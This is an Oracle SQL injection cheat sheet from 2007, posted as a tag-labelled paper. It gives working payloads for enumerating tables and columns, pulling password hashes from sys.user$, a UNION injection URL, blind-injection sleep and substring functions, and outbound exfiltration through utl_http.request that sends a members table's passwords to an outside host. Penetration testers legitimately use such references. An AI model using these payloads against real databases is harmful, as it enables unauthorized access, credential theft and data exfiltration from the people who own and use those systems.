ORACLE SQL Injection Cheat Sheet
Etiketler sql injection, oracle, paper, english, cheat sheet, 02.10.2007
*
Introduction
* ORACLE SQL Injection Notes
*
Concatenation
*
Comments
*
Casting
* Strings without Quotes
* Getting Stuff
o Getting Tables
o
Getting Columns
o Getting Current Database Name
o Getting Users and Passwords
o Getting Version
o Getting Current User
* Simple Union Query
* Simulating SQL Server's TOP feature
* Moving Records one by one
* Functions useful for Blind SQL Injection
* Doing outbound connections
* References, Credits, Thanks & Document History
Introduction
Quick and Dirty ORACLE SQL Injection Cheat Sheet which will be combined with main SQL Injection Cheat Sheet eventually. This cheat sheet can help you to get started for basic ORACLE SQL Injections.
ORACLE SQL Injection Notes
In ORACLE you can not just SELECT stuff you have to SELECT them from some table. For this purpose you can use special table called DUAL.
i.e. SELECT 'dummydata' || 'x' FROM DUAL;
You have to close comments if you used /* comment */ style comments
Concatenation
SELECT utl_raw.concat('x','y') FROM DUAL; SELECT 'x' || 'y' FROM DUAL; SELECT 'a' || 'b' FROM DUAL; SELECT user || '-' || password FROM members;
Comments
/* comment */
Note : You have to close this comments properly otherwise you'll get syntax error.
Line comment : --
Casting
For most of the data types concatenating data with a string can do the casting automatically. SELECT 1 || 'a' FROM DUAL;
Strings without quotes
SELECT chr(110) || chr(111) FROM DUAL;
OR
SELECT utl_raw.cast_to_varchar2(TO_CHAR(110)) FROM DUAL;
Getting Stuff
Getting Tables
SELECT table_name FROM all_tables WHERE TABLESPACE_NAME='USERS'
Getting Columns
SELECT column_name FROM all_tab_columns WHERE table_name = 'TABLE-NAME'
Getting Current Database Name
SELECT global_name FROM global_name
Getting Users and Passwords
SELECT name, password FROM sys.user$ where type#=1
Getting version
Select banner || '-' || (select banner from v$version where banner like 'Oracle%') from v$version where banner like 'TNS%'
Getting Current User
SELECT user FROM dual
Simple Union Query
http://127.0.0.1/sqlinjection/ora.php?id=-101%20UNION%20ALL%20SELECT%20(SELECT%20user%20FROM%20dual)%20FROM%20DUAL
Simulating SQL Server's TOP feature
SELECT FIRST_NAME FROM (SELECT ROWNUM R, FIRST_NAME FROM hr.employees) WHERE R <= 3;
Moving Records one by one
SELECT FIRST_NAME FROM (SELECT ROWNUM R, FIRST_NAME FROM hr.employees) WHERE R = 3;
Functions useful for Blind SQL Injetion
* BEGIN DBMS_LOCK.SLEEP(5); END; - Sleep for 5 seconds
* CHR() - Convert to Char
* ASCII() - Convert to ASCII
* SUBSTR() - Substring
* BITAND() - Bit And operation
* LOWER() - Convert to LowerCase
Doing outbound connections
* SELECT utl_http.request('http://www.example.com') FROM DUAL SELECT utl_http.request('http://www.example.com/?' || (SELECT pass FROM members) ) FROM DUAL
* SELECT HTTPURITYPE('http://www.example.com').getXML() FROM DUAL;
You can test blind SQL Injection from DNS requests (can be more reliable against egress filtering) or from actual web request.
References, Papers & Credits
* Thanks to Pentestmonkey, Notsosecure, Alexander Kornbrust
* SQL Injection Attacks for ORACLE Developers
* Red Database Security Papers
* SQL Injection Cheat Sheet
Document History
* 02/10/2007 - Public Release
* 02/10/2007 - Getting passwords section and utl_http replaced with new and easier ones. Thanks to Alexander Kornbrust
* 09/10/2007 - Sleep function added
